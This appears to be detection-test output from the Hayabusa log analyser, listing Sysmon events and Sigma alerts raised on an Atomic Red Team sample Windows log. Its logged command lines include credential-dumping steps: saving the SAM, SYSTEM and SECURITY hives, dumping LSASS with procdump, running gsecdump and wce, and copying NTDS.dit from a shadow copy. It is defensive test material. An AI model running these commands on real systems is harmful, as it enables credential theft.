+2019-07-19 23:57:52.982 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: pcalua.exe -a C:\Windows\system32\javacpl.cpl | Process: C:\Windows\System32\pcalua.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a C:\Windows\system32\javacpl.cpl"" | LID: 0x50951 | PID: 112 | PGUID: 747F3D96-DA70-5D31-0000-00100E2C3F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:53.882 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6168 | PGUID: 747F3D96-DA71-5D31-0000-00101A463F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:54.099 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1300 | PGUID: 747F3D96-DA72-5D31-0000-0010044F3F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:54.129 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe | Process: C:\Windows\System32\forfiles.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe"" | LID: 0x50951 | PID: 3680 | PGUID: 747F3D96-DA72-5D31-0000-001056513F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:54.165 +09:00,MSEDGEWIN10,1,low,Evas,Indirect Command Execution,,rules/sigma/process_creation/proc_creation_win_indirect_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:54.165 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe | LID: 0x50951 | PID: 3160 | PGUID: 747F3D96-DA72-5D31-0000-0010B1543F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:55.069 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""forfiles /p c:\windows\system32 /m notepad.exe /c "" c:\folder\normal.dll:evil.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1052 | PGUID: 747F3D96-DA73-5D31-0000-00106A8D3F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:55.138 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: forfiles /p c:\windows\system32 /m notepad.exe /c c:\folder\normal.dll:evil.exe | Process: C:\Windows\System32\forfiles.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""forfiles /p c:\windows\system32 /m notepad.exe /c "" c:\folder\normal.dll:evil.exe | LID: 0x50951 | PID: 4092 | PGUID: 747F3D96-DA73-5D31-0000-0010918F3F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:55.236 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1724 | PGUID: 747F3D96-DA73-5D31-0000-001061933F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:58.359 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49734 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3912 | PGUID: 747F3D96-D6F7-5D31-0000-00104ACE2500,rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:58.359 +09:00,MSEDGEWIN10,3,low,Exec,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:09:40.973 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 4516 288 0000023C0CA1FA70 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 3496 | PGUID: 747F3D96-DD34-5D31-0000-0010FCC64800,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:09:43.329 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x50951 | PID: 5632 | PGUID: 747F3D96-DD37-5D31-0000-00109D4C4900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:09:59.931 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: powershell | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x50951 | PID: 5840 | PGUID: 747F3D96-DD47-5D31-0000-001015874900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:09:59.931 +09:00,MSEDGEWIN10,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:10:52.700 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:10:52.700 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\3ivx11ib\3ivx11ib.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 5840 | PGUID: 747F3D96-DD47-5D31-0000-001015874900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:07.994 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\whoami.exe"" /user | Process: C:\Windows\System32\whoami.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5792 | PGUID: 747F3D96-DD8B-5D31-0000-001094584A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:07.994 +09:00,MSEDGEWIN10,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:07.994 +09:00,MSEDGEWIN10,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:08.184 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49744 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 5840 | PGUID: 747F3D96-DD47-5D31-0000-001015874900,rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:08.184 +09:00,MSEDGEWIN10,3,low,Exec,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:16.487 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1010 | Src PID: 5840 | Src PGUID: 747F3D96-DD47-5D31-0000-001015874900 | Tgt PID: 612 | Tgt PGUID: 747F3D96-D4A4-5D31-0000-00104A560000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:16.487 +09:00,MSEDGEWIN10,10,high,CredAccess,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:16.487 +09:00,MSEDGEWIN10,10,high,CredAccess,Accessing WinAPI in PowerShell for Credentials Dumping,,rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:16.986 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""gsecdump -a"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3920 | PGUID: 747F3D96-DD94-5D31-0000-0010F4864A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:17.027 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5476 | PGUID: 747F3D96-DD95-5D31-0000-0010148A4A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:17.107 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""wce -o output.txt"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5216 | PGUID: 747F3D96-DD95-5D31-0000-0010B38E4A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:17.149 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6264 | PGUID: 747F3D96-DD95-5D31-0000-0010D6914A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:17.224 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\sam sam"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 7140 | PGUID: 747F3D96-DD95-5D31-0000-001075964A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:17.224 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:17.243 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg save HKLM\sam sam | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\sam sam"" | LID: 0x50951 | PID: 868 | PGUID: 747F3D96-DD95-5D31-0000-0010C7984A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:17.243 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:21.090 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\system system"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4080 | PGUID: 747F3D96-DD99-5D31-0000-001069A34A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:21.090 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:21.105 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg save HKLM\system system | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\system system"" | LID: 0x50951 | PID: 1136 | PGUID: 747F3D96-DD99-5D31-0000-0010BBA54A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:21.105 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:23.317 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\security security"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 7164 | PGUID: 747F3D96-DD9B-5D31-0000-00106C1C4B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:23.317 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:23.336 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg save HKLM\security security | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\security security"" | LID: 0x50951 | PID: 4464 | PGUID: 747F3D96-DD9B-5D31-0000-0010BE1E4B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:23.336 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:26.549 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3016 | PGUID: 747F3D96-DD9E-5D31-0000-0010CB274B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,critical,Evas | CredAccess,Suspicious Use of Procdump on LSASS,,rules/sigma/process_creation/proc_creation_win_susp_procdump_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""procdump.exe -accepteula -ma lsass.exe lsass_dump.dmp"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5488 | PGUID: 747F3D96-DD9E-5D31-0000-00106E2C4B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,critical,Evas,Renamed ProcDump,,rules/sigma/process_creation/proc_creation_win_renamed_procdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Use of Procdump,,rules/sigma/process_creation/proc_creation_win_susp_procdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,low,ResDev,Usage of Sysinternals Tools,,rules/sigma/process_creation/proc_creation_win_sysinternals_eula_accepted.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,medium,Evas,Procdump Usage,,rules/sigma/process_creation/proc_creation_win_procdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,high,CredAccess,LSASS Memory Dumping,,rules/sigma/process_creation/proc_creation_win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:26.686 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 264 | PGUID: 747F3D96-DD9E-5D31-0000-00109A2F4B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:26.852 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""ntdsutil “ac i ntds” “ifm” “create full C:\Atomic_Red_Team q q"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 584 | PGUID: 747F3D96-DD9E-5D31-0000-001059374B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:26.852 +09:00,MSEDGEWIN10,1,high,Evas,Obfuscated Command Line Using Special Unicode Characters,,rules/sigma/process_creation/proc_creation_win_susp_char_in_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:26.884 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4208 | PGUID: 747F3D96-DD9E-5D31-0000-00106D3A4B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:26.971 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""vssadmin.exe create shadow /for=C:"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5036 | PGUID: 747F3D96-DD9E-5D31-0000-00100C3F4B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:26.989 +09:00,MSEDGEWIN10,1,medium,CredAccess,Shadow Copies Creation Using Operating Systems Utilities,,rules/sigma/process_creation/proc_creation_win_shadow_copies_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:26.989 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: vssadmin.exe create shadow /for=C: | Process: C:\Windows\System32\vssadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""vssadmin.exe create shadow /for=C:"" | LID: 0x50951 | PID: 6584 | PGUID: 747F3D96-DD9E-5D31-0000-00105E414B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:27.082 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3344 | PGUID: 747F3D96-DD9F-5D31-0000-00107B454B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:27.169 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\Extract\ntds.dit"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5772 | PGUID: 747F3D96-DD9F-5D31-0000-00101A4A4B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:27.169 +09:00,MSEDGEWIN10,1,high,CredAccess,Copying Sensitive Files with Credential Data,,rules/sigma/process_creation/proc_creation_win_copying_sensitive_files_with_credential_data.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:27.202 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Extract\VSC_SYSTEM_HIVE"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 976 | PGUID: 747F3D96-DD9F-5D31-0000-00102D4D4B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:27.202 +09:00,MSEDGEWIN10,1,high,CredAccess,Copying Sensitive Files with Credential Data,,rules/sigma/process_creation/proc_creation_win_copying_sensitive_files_with_credential_data.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:27.202 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Copy From or To System32,,rules/sigma/process_creation/proc_creation_win_susp_copy_system32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
